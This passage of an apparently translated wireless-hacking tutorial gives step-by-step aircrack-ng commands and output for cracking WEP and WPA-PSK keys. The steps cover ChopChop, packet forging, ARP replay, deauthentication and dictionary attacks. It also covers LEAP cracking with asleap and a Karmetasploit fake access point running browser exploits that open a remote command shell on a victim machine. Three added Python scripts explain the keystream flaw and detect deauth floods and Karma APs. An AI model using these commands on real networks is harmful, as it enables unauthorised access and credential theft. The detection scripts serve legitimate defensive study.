[0x05e] - KoreK ChopChop Attack
A guy named KoreK developed a tricky attack method called ChopChop. It requires only a single encrypted packet: that packet is decrypted to obtain the keystream, the keystream is then used to generate an ARP request packet, and finally an ARP request replay attack is carried out.
To use the ChopChop attack, type the following command:
#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet to decrypt.
The response looks like this:
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K...
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72                     .........r
Use this packet ?
Again, we type "y".
Use this packet ? y
Then the decryption proceeds.
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms
The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround: IP header re-creation.
This doesn't look like an IP packet, try another one.
Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
This process produces an xor file and a cap file. The xor file contains the keystream; the cap file contains the decrypted packet.
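Why the keystream in that xor file is usable at all comes down to one property of WEP: RC4 is a stream cipher, so every ciphertext byte is simply plaintext XOR keystream, and nothing in the frame binds the keystream to the data. The following script is an added example, not code from the original article or from aircrack-ng. It takes the hex dump and the "Offset ... xor ... pt" lines printed above and checks that XOR relation byte by byte, then decrypts the recovered tail of the frame using only the keystream column. One assumption is drawn from the data rather than from any documentation: in this capture, tool offset N lines up with byte N+2 of the dump, i.e. the two-byte QoS control field of this 0x88 (QoS data) frame is not counted.

```python
import re
from typing import Dict, List, Tuple

# Hex dump of the chosen frame, copied from the aireplay-ng output above
# (90 bytes: QoS-data header, IV/key-id, encrypted payload, encrypted ICV).
FRAME_DUMP = """
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7
0x0050: b09b f0f1 8b04 fc1c 0b72
"""

# ChopChop progress lines copied from the output above; the parser accepts
# lines with or without the trailing "frames written" column.
CHOPCHOP_LOG = """
Offset 87 ( 3% done) | xor = 4E | pt = 3C |
Offset 86 ( 5% done) | xor = 16 | pt = 1D |
Offset 85 ( 7% done) | xor = 63 | pt = 7F |
Offset 84 ( 8% done) | xor = 97 | pt = 6B |
Offset 83 (10% done) | xor = 0E | pt = 0A |
Offset 82 (12% done) | xor = 86 | pt = 0D |
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
"""

OFFSET_RE = re.compile(r"Offset\s+(\d+).*?xor = ([0-9A-Fa-f]{2}).*?pt = ([0-9A-Fa-f]{2})")

# Assumption drawn from this capture only: tool offset N is byte N + 2 of the
# dump, so the two-byte QoS control field of the 0x88 frame is not counted.
QOS_SHIFT = 2


def parse_dump(dump: str) -> bytes:
    """Turn an aireplay-ng style hex dump back into raw frame bytes."""
    out = bytearray()
    for line in dump.strip().splitlines():
        _addr, _, words = line.partition(":")
        out += bytes.fromhex(words.replace(" ", ""))
    return bytes(out)


def parse_chopchop(log: str) -> Dict[int, Tuple[int, int]]:
    """Map each reported offset to (keystream byte, plaintext byte)."""
    found = {}
    for m in OFFSET_RE.finditer(log):
        found[int(m.group(1))] = (int(m.group(2), 16), int(m.group(3), 16))
    return found


def mismatched_offsets(frame: bytes, recovered: Dict[int, Tuple[int, int]],
                       shift: int = QOS_SHIFT) -> List[int]:
    """Offsets where keystream XOR plaintext does not reproduce the captured
    byte. For a genuine RC4 keystream the list is empty: C = P xor K byte-wise."""
    return sorted(off for off, (ks, pt) in recovered.items()
                  if frame[off + shift] != ks ^ pt)


def recovered_plaintext(frame: bytes, recovered: Dict[int, Tuple[int, int]],
                        shift: int = QOS_SHIFT) -> bytes:
    """Decrypt the recovered tail of the frame from the keystream column alone
    (the pt column is ignored), lowest offset first."""
    return bytes(frame[off + shift] ^ ks
                 for off, (ks, _pt) in sorted(recovered.items()))


if __name__ == "__main__":
    frame = parse_dump(FRAME_DUMP)
    rec = parse_chopchop(CHOPCHOP_LOG)
    print("offsets that break C = P xor K:", mismatched_offsets(frame, rec))
    print("plaintext tail (offsets 81..87):", recovered_plaintext(frame, rec).hex())
```

The four highest offsets (84 to 87) decrypt to the frame's ICV, which is a plain CRC-32 of the data with no key involved; that unkeyed, linear integrity check is the second ingredient the attack depends on, and the reason WPA replaced it with a keyed MIC.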
[0x05f] - Packet Forging
Create an encrypted packet using the PRGA (XOR keystream) obtained from the ChopChop or fragmentation attack.
#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp
The result is:
Wrote packet to: arp
With this command, we obtain an ARP request packet saved in the file named "arp".
[0x05g] - Interactive ARP Replay Attack
We use aireplay to inject the ARP request packet towards the access point by entering the following command.
#aireplay-ng -2 -r arp rausb0
The response will look like this:
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
We answer "y".
Use this packet ? y
aireplay-ng starts injecting packets.
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
[0x05h] - Cracking the WEP Key
After we have collected enough encrypted packets, we use aircrack-ng to recover the key.
#aircrack-ng -z capture1.cap (PTW Attack)
A successful crack looks like this:
Opening capture1.cap
Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
[0x06] - Summary Script for Cracking WEP
Note: $AP is the MAC address of the access point
$WIFI is the MAC address of the wireless card
- airmon-ng start wlan0 11 (monitor mode must be started on the specific channel)
- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
  If it does not work, try: #aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap
** These methods can be used for WEP cracking when a client is present.
[0x07] - Obtaining the WPA-PSK/WPA2-PSK Key
PSK stands for Pre-Shared Key. This mechanism was improved to address the weaknesses of WEP.
Therefore, the key cannot be recovered with the same method used for WEP; the only way to recover a WPA-PSK or WPA2-PSK key is to capture the 4-way handshake and run a dictionary attack against it.
The idea behind cracking the pre-shared key is to collect the four-way handshake packets. We can do this by deauthenticating an associated client. This forces the client to re-authenticate, and we can capture the four-way handshake during that process. The deauthentication command is shown below:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
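The "Sending 64 directed DeAuth" line above is also exactly what a wireless IDS looks for: a legitimate access point never has a reason to send dozens of deauthentication frames to one station within a second. The script below is an added example, not code from the original article or from aircrack-ng. It parses bare 802.11 management frames, counts deauthentication and disassociation frames per (source, destination) pair with a sliding time window, and alerts when the peak count exceeds a threshold. Because the source address is trivially spoofed (the flood above is sent in the AP's name), the rate rather than the sender is the signal. The frames, timestamps, threshold and window size are all constructed for the example; the two MAC addresses are borrowed from the capture earlier on this page purely as sample values.

```python
import struct
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

AP = bytes.fromhex("001b2f3dcbd6")    # BSSID from the article's WEP capture (sample value)
STA = bytes.fromhex("001a7337e2a3")   # a client address from the same capture (sample value)

FC_DEAUTH = 0x00C0          # frame control: type 0 (management), subtype 12 (deauthentication)
DEAUTH_SUBTYPES = (10, 12)  # 10 = disassociation, 12 = deauthentication


def build_deauth(addr1: bytes, addr2: bytes, bssid: bytes, seq: int, reason: int = 7) -> bytes:
    """Build a bare 802.11 deauthentication frame (no radiotap header, no FCS).
    The reason code is just a constructed sample value."""
    seq_ctrl = (seq & 0x0FFF) << 4
    return (struct.pack("<HH", FC_DEAUTH, 0x013A) + addr1 + addr2 + bssid
            + struct.pack("<HH", seq_ctrl, reason))


def parse_mgmt(frame: bytes) -> Optional[Dict[str, object]]:
    """Return the fields of a deauth/disassoc frame, or None for any other frame."""
    if len(frame) < 26:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in DEAUTH_SUBTYPES:
        return None
    return {
        "kind": "deauth" if subtype == 12 else "disassoc",
        "dst": frame[4:10].hex(":"),
        "src": frame[10:16].hex(":"),
        "bssid": frame[16:22].hex(":"),
        "reason": struct.unpack_from("<H", frame, 24)[0],
    }


def detect_deauth_flood(frames: List[Tuple[float, bytes]], threshold: int = 10,
                        window_s: float = 10.0) -> List[Tuple[str, str, int]]:
    """Slide a time window over the deauth/disassoc frames of each (src, dst)
    pair and report pairs whose peak count inside one window exceeds
    `threshold` (an assumed value; tune it to the environment)."""
    stamps_by_pair: Dict[Tuple[str, str], List[float]] = defaultdict(list)
    for ts, raw in frames:
        info = parse_mgmt(raw)
        if info is not None:
            stamps_by_pair[(info["src"], info["dst"])].append(ts)
    alerts = []
    for (src, dst), stamps in stamps_by_pair.items():
        stamps.sort()
        peak = start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts.append((src, dst, peak))
    return alerts


def sample_capture() -> List[Tuple[float, bytes]]:
    """Constructed traffic: one ordinary deauth (a station leaving), one QoS data
    frame the detector must ignore, then 64 directed deauth frames sent in the
    AP's name towards the client inside one second, as in the log above."""
    cap = [(0.0, build_deauth(AP, STA, AP, 1, reason=3))]
    qos_data_header = bytes.fromhex("88422c00001a7337e2a3001b2f3dcbd6001b2f3dcbd660840000")
    cap.append((50.0, qos_data_header + b"\x00" * 8))
    for i in range(64):
        cap.append((100.0 + i * 0.015, build_deauth(STA, AP, AP, 100 + i)))
    return cap


if __name__ == "__main__":
    for src, dst, n in detect_deauth_flood(sample_capture()):
        print(f"ALERT deauth flood {src} -> {dst}: {n} frames within 10s")
```

On a real capture the frames would come from a monitor-mode pcap with the radiotap header stripped; the detector itself does not change. Networks that deploy 802.11w (Protected Management Frames) make this flood ineffective in the first place, since deauthentication frames then have to be authenticated.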
Suppose we captured this process in the workshop.cap file. We then use aircrack to crack it:
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
A successful result looks like this:
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
From this result we can see that the WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".
[0x08] - Exploiting Enterprise Wireless Networks (WPA-TLS/TTLS/PEAP)
Most companies have moved to wireless networks that use public-key cryptography, and they believe these are absolutely secure. However, a cunning attacker can still attack such a system by spoofing the certificate.
This attack method exploits the client side. Many clients accept the authentication without checking whether the certificate is genuine, or whether there is a certificate at all. This allows the attacker to impersonate the RADIUS server and capture the victim's login credentials.
We can use FreeRADIUS with the WPE patch to pose as the RADIUS server and have the login credentials logged on the FreeRADIUS server. Further details: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
[0x09] - Exploiting Cisco LEAP
Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) is a wireless authentication scheme intended to eliminate security weaknesses through user-based authentication and the generation of dynamic WEP keys. Cisco LEAP is a designated 802.1X Extensible Authentication Protocol (EAP) type.
LEAP is easy to deploy and manage, with features such as:
- Mutual authentication
- User-based authentication
- Dynamic WEP keys
We find that the username is sent to the RADIUS server in cleartext, while the password captured in Wireshark is encrypted; it is nonetheless easy to exploit. asleap is a tool for recovering weak LEAP and PPTP passwords. asleap can perform:
- Recovery of weak LEAP and PPTP passwords
- Deauthentication of WLAN clients (to speed up LEAP password recovery), using the AirJack driver
Download asleap: http://asleap.sourceforge.net/
The first step is to use asleap's genkeys to build the required database (.dat) and index (.idx) files:
#./genkeys -r dict -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
#./genkeys -r dictionary -f dict.dat -n dict.idx
genkeys 1.4 - generates lookup file for asleap. <mailto:[email protected]>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
The final step is to recover the weak LEAP password by running asleap with the newly created .dat and .idx files:
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
asleap 1.4 - actively recover LEAP/PPTP passwords. <mailto:[email protected]>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
Note: the success rate depends on the size of the dictionary.
asleap 2.2 now includes the "-C" and "-R" options to specify the challenge and response as delimited hex bytes. With these options, asleap becomes a generic MS-CHAPv2 cracking tool.
[0x10] - Mass Exploitation with Karmetasploit
HD Moore has published instructions (http://trac.metasploit.com/wiki/Karmetasploit) for getting the Karmetasploit framework working.
Karmetasploit can broadcast a fake AP and accept connections from clients. The attacker can log cookies, FTP and HTTP credentials, authentication information and so on, and can also exploit browser vulnerabilities on the client machine.
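What makes a Karma-style fake AP detectable is the very behaviour that makes it work: it answers every probe request with a probe response carrying whatever SSID the client asked for, so a single BSSID appears to own many unrelated network names, and only names that some client has just probed for. The script below is an added example, not code from the original article, Karmetasploit or airbase-ng. It counts distinct SSIDs per responding BSSID and flags a BSSID that advertises more than a threshold of names, all of which mirror client probes; a legitimate multi-SSID AP fails that second test because it advertises its own names whether or not anyone probes for them. All probe records are constructed; the two AP addresses borrowed from listings later in this section are used only as sample values, and the threshold is an assumption.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set, Tuple


class ProbeRecord(NamedTuple):
    kind: str   # "req" = probe request from a client, "resp" = probe response from an AP
    mac: str    # transmitter: client MAC for a request, BSSID for a response
    ssid: str   # SSID carried in the frame; "" is a broadcast (wildcard) probe


# Sample addresses: two clients, one honest single-SSID AP, one honest
# multi-SSID AP, and one Karma AP. The honest and Karma BSSIDs are values
# printed later in this section, reused here purely as sample data.
CLIENT_A = "00:21:27:c0:07:71"
CLIENT_B = "00:1a:73:37:e2:a3"
HONEST_AP = "00:14:06:11:42:a2"   # 'WORKSHOP' in the aireplay-ng -9 listing
MULTI_AP = "02:00:00:00:00:03"    # constructed corporate AP with three SSIDs
KARMA_AP = "00:40:1b:5b:b0:0b"    # the faked MAC that kmsapng.sh prints

# Constructed probe traffic.
SAMPLE_RECORDS = [
    ProbeRecord("req", CLIENT_A, "linksys"),
    ProbeRecord("resp", KARMA_AP, "linksys"),
    ProbeRecord("req", CLIENT_A, "HomeWiFi"),
    ProbeRecord("resp", KARMA_AP, "HomeWiFi"),
    ProbeRecord("req", CLIENT_B, "WORKSHOP"),
    ProbeRecord("resp", HONEST_AP, "WORKSHOP"),
    ProbeRecord("resp", KARMA_AP, "WORKSHOP"),
    ProbeRecord("req", CLIENT_B, "CoffeeShop"),
    ProbeRecord("resp", KARMA_AP, "CoffeeShop"),
    ProbeRecord("req", CLIENT_B, ""),            # broadcast probe
    ProbeRecord("resp", HONEST_AP, "WORKSHOP"),
    ProbeRecord("resp", MULTI_AP, "Corp"),       # answers the broadcast probe
    ProbeRecord("resp", MULTI_AP, "Corp-Guest"),
    ProbeRecord("resp", MULTI_AP, "Corp-IoT"),
]


def probed_ssids(records: List[ProbeRecord]) -> Set[str]:
    """Every SSID some client asked for (including "" for broadcast probes)."""
    return {r.ssid for r in records if r.kind == "req"}


def ssids_per_bssid(records: List[ProbeRecord]) -> Dict[str, Set[str]]:
    """Distinct SSIDs each BSSID has advertised in probe responses."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for r in records:
        if r.kind == "resp":
            seen[r.mac].add(r.ssid)
    return dict(seen)


def find_karma_aps(records: List[ProbeRecord], max_ssids: int = 2) -> List[Tuple[str, List[str]]]:
    """Flag a BSSID that advertises more than `max_ssids` distinct names AND
    only ever advertises names a client probed for. `max_ssids` is an assumed
    threshold; many real APs legitimately serve two or three SSIDs."""
    asked = probed_ssids(records) - {""}
    flagged = []
    for bssid, names in ssids_per_bssid(records).items():
        if len(names) > max_ssids and names <= asked:
            flagged.append((bssid, sorted(names)))
    return flagged


if __name__ == "__main__":
    for bssid, names in find_karma_aps(SAMPLE_RECORDS):
        print(f"possible Karma AP {bssid}: answers for {names}")
```

The same heuristic is why clients should be configured not to probe for remembered hidden networks and why corporate supplicants should validate the server certificate for enterprise SSIDs: a Karma AP can only impersonate names it hears.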
This method was tested on BackTrack 3 (final).
1. Update Aircrack-ng
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
2. Let's test that aireplay-ng works (your wireless card must support packet injection)
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%
Now injection is working!
3. Update Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. Download the Bash script: http://www.darkoperator.com/kmsapng.tgz
The script does the following:
- Changes the MAC address of the interface
- Puts the interface into monitor mode
- Starts Airbase-ng as the Karma AP
- Changes the interface MTU size
- Sets the IP address
- Starts the DHCPD server
- Sets up iptables redirection
- Starts Metasploit
6. Then we run kmsapng.sh like this:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ...
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
D:\Mozilla Firefox> cd ..
D:\> net user
\\CZY 的用戶帳戶
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CZY CZY SUPPORT_388945a0
命令成功完成。
[0x11] - End of the Journey
All of the operations were carried out in a Linux environment. In any case, I hope this has been helpful to you.
This article was written for the purpose of technical exchange and legal penetration testing; the author is not responsible for any damage caused by using its contents. If you want to use these techniques against someone else's system, you must obtain their consent or do so as part of a legal penetration test.